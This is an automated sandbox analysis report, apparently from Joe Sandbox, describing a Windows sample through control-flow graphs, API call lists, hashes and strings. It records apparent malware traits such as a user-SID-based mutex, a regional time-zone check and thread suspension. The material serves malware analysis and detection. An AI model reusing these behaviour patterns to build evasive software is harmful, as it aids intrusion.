                                                                                control_flow_graph 1454 411710-4117bc call 4120d0 call 412710 call 412670 * 4 call 403e70 call 404a40 1471 4117c0-4117c9 1454->1471 1472 4117be 1454->1472 1473 411817 1471->1473 1474 4117cb-4117ce 1471->1474 1472->1471 1477 411819-41181f 1473->1477 1475 4117e1-4117e4 1474->1475 1476 4117d0-4117d4 1474->1476 1478 4117e6-4117ea 1475->1478 1480 411813-411815 1475->1480 1476->1478 1479 4117d6-4117df 1476->1479 1481 411821-41182d 1477->1481 1482 41184d-411865 1477->1482 1478->1473 1485 4117ec-4117ef 1478->1485 1479->1475 1479->1476 1480->1477 1486 411843-41184a call 4131ab 1481->1486 1487 41182f-41183d 1481->1487 1483 411893-4118ab 1482->1483 1484 411867-411873 1482->1484 1493 4118d9-4118f1 1483->1493 1494 4118ad-4118b9 1483->1494 1490 411875-411883 1484->1490 1491 411889-411890 call 4131ab 1484->1491 1485->1480 1492 4117f1-4117f7 1485->1492 1486->1482 1487->1486 1488 411968 call 417eb2 1487->1488 1510 41196d-411a4d call 4154ef call 4120d0 call 402150 call 4120d0 call 402150 call 402380 call 404a40 call 402c50 call 404a40 call 402c50 call 404a40 call 412580 * 2 call 402e50 call 411f30 1488->1510 1490->1488 1490->1491 1491->1483 1492->1473 1499 4117f9-4117fc 1492->1499 1495 4118f3-4118ff 1493->1495 1496 41191b-411933 1493->1496 1500 4118bb-4118c9 1494->1500 1501 4118cf-4118d6 call 4131ab 1494->1501 1503 411911-411918 call 4131ab 1495->1503 1504 411901-41190f 1495->1504 1505 411935-411941 1496->1505 1506 41195d-41195f 1496->1506 1499->1480 1508 4117fe-411804 1499->1508 1500->1488 1500->1501 1501->1493 1503->1496 1504->1488 1504->1503 1513 411953-41195a call 4131ab 1505->1513 1514 411943-411951 1505->1514 1506->1510 1516 411961-411967 1506->1516 1508->1473 1515 411806-411809 1508->1515 1551 411a7b-411a93 1510->1551 1552 411a4f-411a5b 1510->1552 1513->1506 1514->1488 1514->1513 1515->1480 1521 41180b-411811 1515->1521 1521->1473 1521->1480 1553 411ac1-411ad9 1551->1553 1554 411a95-411aa1 1551->1554 1555 411a71-411a78 call 4131ab 1552->1555 1556 411a5d-411a6b 1552->1556 1561 411b07-411b1f 1553->1561 1562 411adb-411ae7 1553->1562 1559 411aa3-411ab1 1554->1559 1560 411ab7-411abe call 4131ab 1554->1560 1555->1551 1556->1555 1557 411b81 call 417eb2 1556->1557 1575 411b86-411b8d call 4131ab 1557->1575 1559->1557 1559->1560 1560->1553 1563 411b21-411b2d 1561->1563 1564 411b49-411b61 1561->1564 1568 411ae9-411af7 1562->1568 1569 411afd-411b04 call 4131ab 1562->1569 1570 411b3f-411b46 call 4131ab 1563->1570 1571 411b2f-411b3d 1563->1571 1572 411b90-411bf0 call 40f200 CreateThread * 5 1564->1572 1573 411b63-411b6f 1564->1573 1568->1557 1568->1569 1569->1561 1570->1564 1571->1557 1571->1570 1585 411bf6-411c02 call 411710 Sleep 1572->1585 1573->1575 1578 411b71-411b7f 1573->1578 1575->1572 1578->1557 1578->1575
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$Sleep
                                                                                • String ID: 425620883392
                                                                                • API String ID: 422425972-3676216964
                                                                                • Opcode ID: 84479cd2be450617f04c1c4ccab801caacb737e1f520803fa0aed91cd58afb33
                                                                                • Instruction ID: 16c40b164f5f579ecfa07685f58cedde3b5f8f59123f0b16dc075b3e10425f12
                                                                                • Opcode Fuzzy Hash: 84479cd2be450617f04c1c4ccab801caacb737e1f520803fa0aed91cd58afb33
                                                                                • Instruction Fuzzy Hash: 51D17C71F001042BEB18B778DD86BDD7E229B82314F20821EE515AB3E6E77D69C1879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1804 421b7c-421ba4 call 4215bd call 42161b 1809 421baa-421bb6 call 4215c3 1804->1809 1810 421ccc-421d28 call 417ecf call 424bae 1804->1810 1809->1810 1815 421bbc-421bc8 call 4215ef 1809->1815 1822 421d32-421d35 1810->1822 1823 421d2a-421d30 1810->1823 1815->1810 1821 421bce-421bef call 419831 GetTimeZoneInformation 1815->1821 1834 421bf5-421c16 1821->1834 1835 421caa-421ccb call 4215b7 call 4215ab call 4215b1 1821->1835 1824 421d37-421d47 call 419d1a 1822->1824 1825 421d78-421d8a 1822->1825 1823->1825 1838 421d51-421d6a call 424bae 1824->1838 1839 421d49 1824->1839 1829 421d9a 1825->1829 1830 421d8c-421d8f 1825->1830 1831 421d9f-421db4 call 419831 call 4139d2 1829->1831 1832 421d9a call 421b7c 1829->1832 1830->1829 1836 421d91-421d98 call 4219a1 1830->1836 1832->1831 1840 421c20-421c27 1834->1840 1841 421c18-421c1d 1834->1841 1836->1831 1861 421d6f-421d75 call 419831 1838->1861 1862 421d6c-421d6d 1838->1862 1847 421d4a-421d4f call 419831 1839->1847 1849 421c39-421c3b 1840->1849 1850 421c29-421c30 1840->1850 1841->1840 1866 421d77 1847->1866 1851 421c3d-421c66 call 41f913 call 41f00b 1849->1851 1850->1849 1856 421c32-421c37 1850->1856 1871 421c74-421c76 1851->1871 1872 421c68-421c6b 1851->1872 1856->1851 1861->1866 1862->1847 1866->1825 1874 421c78-421c96 call 41f00b 1871->1874 1872->1871 1873 421c6d-421c72 1872->1873 1873->1874 1877 421ca5-421ca8 1874->1877 1878 421c98-421c9b 1874->1878 1877->1835 1878->1877 1879 421c9d-421ca3 1878->1879 1879->1835
                                                                                APIs
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042F678), ref: 00421BE6
                                                                                • _free.LIBCMT ref: 00421BD4
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 00421DA0
                                                                                Strings
                                                                                • W. Europe Standard Time, xrefs: 00421C55
                                                                                • W. Europe Daylight Time, xrefs: 00421C84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                • API String ID: 2155170405-986674615
                                                                                • Opcode ID: 7f923c14f9b7e4efb6f64e0be5ccfc421e4ae72419d5372e6a4208f577db8cfa
                                                                                • Instruction ID: 80643e636257d3479dfb1524777211dc6722e7f82ab559556bc9aab89ca9d8e1
                                                                                • Opcode Fuzzy Hash: 7f923c14f9b7e4efb6f64e0be5ccfc421e4ae72419d5372e6a4208f577db8cfa
                                                                                • Instruction Fuzzy Hash: 4B513B75E00225ABCB24EF76EC829AE77B8EF50314B51417BE411932A1D7389E418B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1920 415b73-415ba8 GetFileType 1921 415c60-415c63 1920->1921 1922 415bae-415bb9 1920->1922 1925 415c65-415c68 1921->1925 1926 415c8c-415cb4 1921->1926 1923 415bdb-415bf7 call 413ef0 GetFileInformationByHandle 1922->1923 1924 415bbb-415bcc call 415ee9 1922->1924 1935 415c7d-415c8a GetLastError call 416401 1923->1935 1941 415bfd-415c3f call 415e3b call 415ce3 * 3 1923->1941 1939 415bd2-415bd9 1924->1939 1940 415c79-415c7b 1924->1940 1925->1926 1929 415c6a-415c6c 1925->1929 1930 415cd1-415cd3 1926->1930 1931 415cb6-415cc9 PeekNamedPipe 1926->1931 1929->1935 1936 415c6e-415c73 call 416437 1929->1936 1932 415cd4-415ce2 call 4139d2 1930->1932 1931->1930 1937 415ccb-415cce 1931->1937 1935->1940 1936->1940 1937->1930 1939->1923 1940->1932 1954 415c44-415c5c call 415e08 1941->1954 1954->1930 1957 415c5e 1954->1957 1957->1940
                                                                                APIs
                                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00415AA5), ref: 00415B95
                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00415BEF
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00415AA5,?,000000FF,00000000,00000000), ref: 00415C7D
                                                                                • __dosmaperr.LIBCMT ref: 00415C84
                                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00415CC1
                                                                                  • Part of subcall function 00415EE9: __dosmaperr.LIBCMT ref: 00415F1E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                • String ID:
                                                                                • API String ID: 1206951868-0
                                                                                • Opcode ID: c7c8139b11d71a24d1e1d36783f63ebfc4138adef9335a36e0eccf54d198dcc5
                                                                                • Instruction ID: 88099238f6437060bc531c8437f52590096e2779159099ed49765dd9aa7e6e7d
                                                                                • Opcode Fuzzy Hash: c7c8139b11d71a24d1e1d36783f63ebfc4138adef9335a36e0eccf54d198dcc5
                                                                                • Instruction Fuzzy Hash: 4B414C71900B04EFDB249FA5D8459EBBBF9EF88300B10452EF456D3610E738A981DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1958 4083df-4083e3 1959 4083e9-408404 call 415614 1958->1959 1960 40847e-4084c6 1958->1960 1966 408411-408419 1959->1966 1967 408406-40840f call 4156a2 1959->1967 1964 4084f0-4084f3 1960->1964 1965 4084c8-4084d4 1960->1965 1968 4084e6-4084ed call 4131ab 1965->1968 1969 4084d6-4084e4 1965->1969 1973 408420-40843b call 415614 1966->1973 1967->1960 1968->1964 1969->1968 1971 4084f4-4084f9 call 417eb2 1969->1971 1980 40844d-408469 call 4120d0 * 2 call 4071a0 1973->1980 1981 40843d-40844b call 4156a2 1973->1981 1990 40846e 1980->1990 1986 408471-40847c Sleep 1981->1986 1986->1960 1986->1973 1990->1986
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep__fread_nolock
                                                                                • String ID: D5C4$DAC4
                                                                                • API String ID: 1389363356-3923605705
                                                                                • Opcode ID: b1f8e113cd360cd512c5eb5ecd93998473f27a1182f6125da232745281f5236f
                                                                                • Instruction ID: 144cbdfc09b04aa5b0f32bee2e9876f8eb8738b4994396107350e652fdcba953
                                                                                • Opcode Fuzzy Hash: b1f8e113cd360cd512c5eb5ecd93998473f27a1182f6125da232745281f5236f
                                                                                • Instruction Fuzzy Hash: 2FB12A71500144ABDB04EF28CE85BDE3726AF95319F54423EF888672C6EB3DD9C18799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2137 4037f0-40387c call 412440 * 3 CreateThread Sleep SuspendThread 2144 4038aa-4038c2 2137->2144 2145 40387e-40388a 2137->2145 2146 4038f0-403908 2144->2146 2147 4038c4-4038d0 2144->2147 2148 4038a0-4038a7 call 4131ab 2145->2148 2149 40388c-40389a 2145->2149 2152 403932-40394a 2146->2152 2153 40390a-403916 2146->2153 2150 4038d2-4038e0 2147->2150 2151 4038e6-4038ed call 4131ab 2147->2151 2148->2144 2149->2148 2154 40397a-40397f call 417eb2 2149->2154 2150->2151 2150->2154 2151->2146 2161 403974-403979 2152->2161 2162 40394c-403958 2152->2162 2159 403928-40392f call 4131ab 2153->2159 2160 403918-403926 2153->2160 2159->2152 2160->2154 2160->2159 2166 40396a-403971 call 4131ab 2162->2166 2167 40395a-403968 2162->2167 2166->2161 2167->2154 2167->2166
                                                                                APIs
                                                                                  • Part of subcall function 00412440: Concurrency::cancel_current_task.LIBCPMT ref: 00412561
                                                                                • CreateThread.KERNEL32 ref: 00403856
                                                                                • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 00403863
                                                                                • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040386A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                • String ID:
                                                                                • API String ID: 1039963361-0
                                                                                • Opcode ID: 50c15cdf61fb1fc4b6d0715f087687a063a4c09995a765d34f536c1601250b8f
                                                                                • Instruction ID: 7004d97d11afafeae392a924bad69d4e0811d904fedd8d814c7ed508116f8222
                                                                                • Opcode Fuzzy Hash: 50c15cdf61fb1fc4b6d0715f087687a063a4c09995a765d34f536c1601250b8f
                                                                                • Instruction Fuzzy Hash: AB41E071210148ABEB18DF28CD85BCD3F6AAF85316F50822AF855972D5C77DD6C08B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2171 421cd7-421d28 call 424bae 2174 421d32-421d35 2171->2174 2175 421d2a-421d30 2171->2175 2176 421d37-421d47 call 419d1a 2174->2176 2177 421d78-421d8a 2174->2177 2175->2177 2186 421d51-421d6a call 424bae 2176->2186 2187 421d49 2176->2187 2179 421d9a 2177->2179 2180 421d8c-421d8f 2177->2180 2181 421d9f-421db4 call 419831 call 4139d2 2179->2181 2182 421d9a call 421b7c 2179->2182 2180->2179 2184 421d91-421d98 call 4219a1 2180->2184 2182->2181 2184->2181 2198 421d6f-421d75 call 419831 2186->2198 2199 421d6c-421d6d 2186->2199 2191 421d4a-421d4f call 419831 2187->2191 2201 421d77 2191->2201 2198->2201 2199->2191 2201->2177
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00421D4A
                                                                                • _free.LIBCMT ref: 00421DA0
                                                                                  • Part of subcall function 00421B7C: _free.LIBCMT ref: 00421BD4
                                                                                  • Part of subcall function 00421B7C: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042F678), ref: 00421BE6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$InformationTimeZone
                                                                                • String ID:
                                                                                • API String ID: 597776487-0
                                                                                • Opcode ID: a57aee05735d0ee82a38767d85209656f360d7a52cd3e9f99fd00689a5667e31
                                                                                • Instruction ID: 878c1ea30b08c9a3dbcd4c0a0de05ef3780ad2d1b9905e881a30390f058fb97e
                                                                                • Opcode Fuzzy Hash: a57aee05735d0ee82a38767d85209656f360d7a52cd3e9f99fd00689a5667e31
                                                                                • Instruction Fuzzy Hash: 1E215472A10135D6C73067356C41EFF7778DFA1324F5002ABE495921A0DB78BEC6855D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fa85814af43257686d64c8ce6606e388436b67fb7325c5549b01051f200d531
                                                                                • Instruction ID: 3d9c21e33356424c53782de9a4a6fb55634e31a09b17d89eeb973488efcb61ea
                                                                                • Opcode Fuzzy Hash: 0fa85814af43257686d64c8ce6606e388436b67fb7325c5549b01051f200d531
                                                                                • Instruction Fuzzy Hash: 3F210831501608BFEB11AB69DC82BDF3768DF813B8F210316F9342B1C1D7789D418669
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00415C1A,?,?,00000000,00000000), ref: 00415D11
                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00415C1A,?,?,00000000,00000000), ref: 00415D25
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                • String ID:
                                                                                • API String ID: 1707611234-0
                                                                                • Opcode ID: da845da7554af857a35d070af8882dd3300e5304f02135c42ff1196ee72c1c8f
                                                                                • Instruction ID: ea9ac4c7761f5c9a30614a79a571d1bdf40d03f0f867609028d75d1a90342668
                                                                                • Opcode Fuzzy Hash: da845da7554af857a35d070af8882dd3300e5304f02135c42ff1196ee72c1c8f
                                                                                • Instruction Fuzzy Hash: 46111C7690050CEBCB10DF95D889EDF77BCAB48310F548267E516E2190EB34EB85CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00402C50: GetUserNameW.ADVAPI32(00000000,?), ref: 00402C7A
                                                                                  • Part of subcall function 00402C50: GetProcessHeap.KERNEL32(00000008,?), ref: 00402C8F
                                                                                  • Part of subcall function 00402C50: HeapAlloc.KERNEL32(00000000), ref: 00402C92
                                                                                  • Part of subcall function 00402C50: GetUserNameW.ADVAPI32(00000000,?), ref: 00402CA0
                                                                                  • Part of subcall function 00402C50: LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402CC3
                                                                                  • Part of subcall function 00402C50: GetProcessHeap.KERNEL32(00000008,?), ref: 00402CCE
                                                                                  • Part of subcall function 00402C50: HeapAlloc.KERNEL32(00000000), ref: 00402CD1
                                                                                  • Part of subcall function 00402C50: GetProcessHeap.KERNEL32(00000008,?), ref: 00402CE1
                                                                                  • Part of subcall function 00402C50: HeapAlloc.KERNEL32(00000000), ref: 00402CE4
                                                                                  • Part of subcall function 00402C50: LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402D0E
                                                                                  • Part of subcall function 00402C50: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00402D21
                                                                                • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 004070F1
                                                                                • GetLastError.KERNEL32 ref: 004070F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Name$AllocProcess$AccountLookupUser$ConvertCreateErrorLastMutexString
                                                                                • String ID:
                                                                                • API String ID: 3154463122-0
                                                                                • Opcode ID: fd5556ecfd65841140c59974ca98c611f959a0fd80ea64547331c6ec55b11bd8
                                                                                • Instruction ID: e194b8f9fa0d05b3892a9ba35126b96f91c9386c7d1dfd7e26d64ad8a07f0760
                                                                                • Opcode Fuzzy Hash: fd5556ecfd65841140c59974ca98c611f959a0fd80ea64547331c6ec55b11bd8
                                                                                • Instruction Fuzzy Hash: 25F0C830E04108ABD714FBA5CD4979F77B5EF44300F90803AE524B62D1DA3C5D4287D6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 36e0c4597b03a4cd6c97403656a2826208cde39d3a08885582f16e823d5751a2
                                                                                • Instruction ID: ff25e32a29ebf782260e7a410bd56a27e1f8dac63b83beb35e274b9ebe4aceb6
                                                                                • Opcode Fuzzy Hash: 36e0c4597b03a4cd6c97403656a2826208cde39d3a08885582f16e823d5751a2
                                                                                • Instruction Fuzzy Hash: F9E0ED7660191212A231323BBC412EE66416B8233AF21433FFC208A1D2FF3C88C7816E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00412561
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task
                                                                                • String ID:
                                                                                • API String ID: 118556049-0
                                                                                • Opcode ID: 5db24f80a27f67ac582c348ff38305803f1b670538adfe0041a8b3fbc2c85f92
                                                                                • Instruction ID: 24e5b17427cf829a5d626ff3f47ca2a70b51820a590cf439ea58b2a1c4e9ea32
                                                                                • Opcode Fuzzy Hash: 5db24f80a27f67ac582c348ff38305803f1b670538adfe0041a8b3fbc2c85f92
                                                                                • Instruction Fuzzy Hash: 613128717002005BD728DE69DAC499EB7A9EF45320B20472FF865C7392E6B8DDE08799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 0040638E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2284958b26bc14f410d38e7b94bccfd7f80b5d08213be89801e0413c3554e7cd
                                                                                • Instruction ID: 5e4587a4b149411e000b3976e81583dd9aad89b11881cc5c414c641979bfa4ad
                                                                                • Opcode Fuzzy Hash: 2284958b26bc14f410d38e7b94bccfd7f80b5d08213be89801e0413c3554e7cd
                                                                                • Instruction Fuzzy Hash: 72215731A1014457EB28CF78CD8479DBA629F82314F20872EE406EB3D6CB7E99D04749
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 004066EE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2e50fec9fb9cf5f71e7faff2635ca7fa59b37b51813e479fc16a8915e671cd33
                                                                                • Instruction ID: 42e6833546794b13b2dd7182ae2af1d71d4b08b1ec60633850d4e21a8e7bd231
                                                                                • Opcode Fuzzy Hash: 2e50fec9fb9cf5f71e7faff2635ca7fa59b37b51813e479fc16a8915e671cd33
                                                                                • Instruction Fuzzy Hash: 9721573160014057EB1CCB78DD887ADBA62AF82318F20872EE006E77D6D77D99D14749
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 0040680E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: a1e68b291657b4d3820fa4337850ea81b57963d0eb79feb93e39cccf2a3f3577
                                                                                • Instruction ID: 5c4284288734da5cef7c3094daefefc1a1a6b69b1868b02381fb7303db3efd1b
                                                                                • Opcode Fuzzy Hash: a1e68b291657b4d3820fa4337850ea81b57963d0eb79feb93e39cccf2a3f3577
                                                                                • Instruction Fuzzy Hash: 60218A32B0010057EB18DB28CD8879DBB62AF82315F20C72EE446A73D6DB3D99D14709
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 0040692E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 0a41367a020ed416e1b3e140fda923ee3a0702e28e6f4138e5e4e3495c37cb47
                                                                                • Instruction ID: debc71cc40b5d659957bdd0f85766bf65af7d054d5eb2b39fa5153ebb0a9bae1
                                                                                • Opcode Fuzzy Hash: 0a41367a020ed416e1b3e140fda923ee3a0702e28e6f4138e5e4e3495c37cb47
                                                                                • Instruction Fuzzy Hash: D02155717001445BEB18CB78CD847ADBA62AF82314F20872EE046EB7DACB3D99D08749
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406A4E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 5274b353adde1be401076a52d474734ed0cf8f8ff5c3d848de892ca13c249232
                                                                                • Instruction ID: d0f3af41efc4c1739b9a00b2fb3808aa9253357b8d3549d4bbe200c2e0e5564d
                                                                                • Opcode Fuzzy Hash: 5274b353adde1be401076a52d474734ed0cf8f8ff5c3d848de892ca13c249232
                                                                                • Instruction Fuzzy Hash: 2C2146717001445BEB1CDA6CCD857ADBA629F82318F20C62EE006EB3D9C77D99D08B49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406B6E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: a6266b7a2c27c0390cc1efb785f09fca76f5080ac6c46ca631c5f089d78e6ccc
                                                                                • Instruction ID: a72790ac1f4c1ce0959ea8f09d997174f444e858c82da276fca349165c723d29
                                                                                • Opcode Fuzzy Hash: a6266b7a2c27c0390cc1efb785f09fca76f5080ac6c46ca631c5f089d78e6ccc
                                                                                • Instruction Fuzzy Hash: 0721987160015047EB1CDB7CCD8579DBA769F81318F20862EE041E73D6C77DA9D04759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406C8E
                                                                                Memory Dump Source
